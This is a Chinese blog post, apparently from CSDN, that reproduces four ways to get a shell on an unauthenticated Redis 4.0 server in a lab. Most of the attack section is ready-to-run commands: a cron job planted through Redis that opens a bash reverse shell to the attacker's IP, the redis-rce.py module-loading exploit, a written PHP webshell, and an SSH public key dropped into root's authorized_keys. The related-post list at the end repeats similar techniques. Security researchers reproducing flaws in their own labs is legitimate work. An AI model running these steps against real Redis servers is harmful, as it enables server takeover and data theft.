【redis漏洞复现】Redis getshell的几种方式

已于 2022-03-07 09:35:24 修改
阅读量1.1w 收藏 16
点赞数 7
分类专栏: 杂项 文章标签: redis linux 信息安全
于 2022-03-01 15:13:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59924300/article/details/123206164
版权

简介:

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。作为一个高性能的key-value数据库,Redis在部分场景下对关系数据库起到很好的补充作用。

环境搭建:

系统:centos7(192.168.111.132)

攻击机:kali(192.168.111.130)

安装redis4.0

1.输入

wget http://download.redis.io/releases/redis-4.0.9.tar.gz

2.解压编译
tar -zxvf redis-4.0.9.tar.gz
cd redis-4.0.9
make
make test
make install

3.修改redis.conf的配置文件添加bind:0.0.0.0

vim redis.conf

4. 启动redis
redis-server /root/redis-4.0.9/redis.conf

getshell(一)

在kali上输入

Redis-cli -h 192.168.111.132//连接目标redis

set  xx   "\n* * * * * bash -i >& /dev/tcp/192.168.111.130/8888 0>&1\n"

config set dir /var/spool/cron/

config set dbfilename root

save

之后监听8888端口,等一会就是收到一个shell

getshell(二)

输入

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git

进入RedisModules-ExecuteCommand目录输入

make

会生成moudle.so 文件

之后输入

cp /home/kali/桌面/RedisModules-ExecuteCommand/module.so /home/kali/桌面/redis-rce

把生成的moudle.so复制到redis-rce目录里面,之后进入redis-rce目录里面输入

python redis-rce.py -r 192.168.111.132 -p 6379 -L 192.168.111.130 -f moudle.so

getshell(三)

上传webshell

redis-cli -h 192.168.111.132----------------------------->连接目标
CONFIG SET dir /www/wwwroot/----------------------------->设置备份路径
CONGIG SET dbfilename x.php ------------------------------>设置备份文件
SET x "<?php system($_GET['cmd']);?>"--------------------->往备份文件里面写入一句话
BGSAVE ---------------------------------->进行保存

之后可以在目标机器中的/www/wwwroot/目录中找到x.php文件

里面的内容:

getshell(四)

前提
a.Redis服务使用ROOT账号启动
b.服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器

首先生成密钥输入

ssh-keygen -t rsa

之后进入/root/.ssh目录把公钥输入到1.txt中

(echo -e "\n";cat id_rsa.pub;echo -e "\n")>1.txt ----------------------->\n是回车

然后输入

cat 1.txt |redis-cli -h 192.168.111.130 -x set crack---------------------->该命令是把一个

key为crack,值为cat 1.txt 添加到redis中

紧接着进入redis中输入

config set dir /root/.ssh
config set dbfilename authorized_keys
save

最后输入使用ssh登陆

 (Ps:redis 查看key keys *:

              查看值 get key

              清空所有值flushall

FlynnAAAA
关注
  • 7
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
redis 在渗透中 getshell 方法总结
chenglanqi6606的博客
05-07 2483
0x00 前言 今天同学突然提到了redis,想到最近搞站确实有一段时间没有遇到redis getshell的场景了(主要是最近懒,搞得少),有些利用方式都忘的差不多,这里再对常见的redis getshell方式总结并复现一遍,避免遗忘。如果有同学恰好看到了这篇文章,并能解决自己的问题,...
第02篇:Redis主从复制getshell1
08-03
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置
redis 未授权访问拿shell
blackguest07的博客
03-18 876
redis未授权访问拿shell
Redis未授权访问漏洞复现与GETSHELL利用方法汇总(含靶场搭建)
W小哥
09-18 1768
一、漏洞产生原因 redis安装完之后,默认情况下绑定在 0.0.0.0:6379,且没有对登录IP做限制,并且没有设置密码(默认为空)。 二、漏洞危害 攻击者无需认证即可访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据; 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件; 最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。 三、靶场搭建 3.1、redis数据库下载安装 访问
redis getshell方法
00勇士王子的博客
03-07 1629
redis getshell方法总结
redis-getshell
m0_60823533的博客
09-25 141
1. 使用yum安装redis 命令:yum install redis -y。地址 http://192.168.88.128/shell.php。2.连接redis服务端(centos),出现以下如图表示连接成功。1.服务端(centos)安装web环境,直接一键安装宝塔。1.进入 /root/.ssh 目录生成ssh公私钥。2.安装完成,打开bt网站后台,安装环境。“\n\n 公钥内容 \n\n“3.添加一个站点,记住以下路径。6.启动redis连接测试。2.将生成的公钥(文件。
redis未授权getshell四种方式
BING
04-24 3615
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
redis渗透中的getshell问题总结
Exploit的小站~
05-10 2万+
 0x00 前言 redis现在很多都是直接对外开放端口,从外网无需任何验证即可直接访问到。相关的例子可以从shodan或者zoomeye上找到。那么问题来了,作为一个内存数据库,redis上肯定也有很多敏感信息,比如redis用于做session的存储,可能导致敏感信息泄露。不过最近研究redis从乌云社区和drops上看到有人getshell,思路比较有趣,特地写一下总结。 ...
Redis_getshell简单复现
qq_52764444的博客
09-22 326
Redis_getshell复现 利用Redis写webshell Redis基于主从复制的RCE Redis未授权访问漏洞
从Reids漏洞聊到getshell手法,再到计划任务和主从复制原理
最新发布
milu_Sec的博客
01-07 957
redis漏洞总结 getshell手法 写文件原理
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
Python如何操作docker redis过程解析
12-17
subp = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,encoding="utf-8") subp.wait(2) if subp.poll() == 0: return subp.communicate() else: return None 获取redis...
redis-buagent:Redis 远程备份代理
06-08
为什么存在有时您不想在节点本身上运行备份,有时您没有对运行 Redis 的节点的 shell 访问权限。 对于这些情况,创建了此备份代理。如何使用它Go 使这部分变得容易。 假设您设置了 GOPATH 环境变量,您只需运行: go...
LinuxRedis未授权访问getshell三种方法 (1、秘钥登录)
daxi0ng的博客
11-26 2331
介绍: REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(H...
Redis主从复制getshell技巧
热门推荐
06-10 2万+
Redis未授权漏洞常见的漏洞利用方式: Windows下,绝对路径写webshell 、写入启动项。 Linux下,绝对路径写webshell 、公私钥认证获取root权限 、利用contrab计划任务反弹shell。 基于Redis主从复制的机制,可以通过FULLRESYNC将任意文件同步到从节点(slave),这就使得它可以轻易实现以上任何一种漏洞利用方式,而且存在着...
记录一次Redis未授权getshell几种常见方法
qq_45888826的博客
09-17 3725
记录一次Redis未授权getshell几种常见方法
kali执行php代码的exp,ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)...
weixin_34698515的博客
03-10 645
前言ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。漏洞分析关键代码:// 获取控制器名$controller = strip_tags($result[1]...
redis未授权访问getshell
03-16
Redis未授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全配置,包括设置密码、限制访问IP等措施。同时,也需要及时更新Redis的版本,以防止已知漏洞被攻击利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值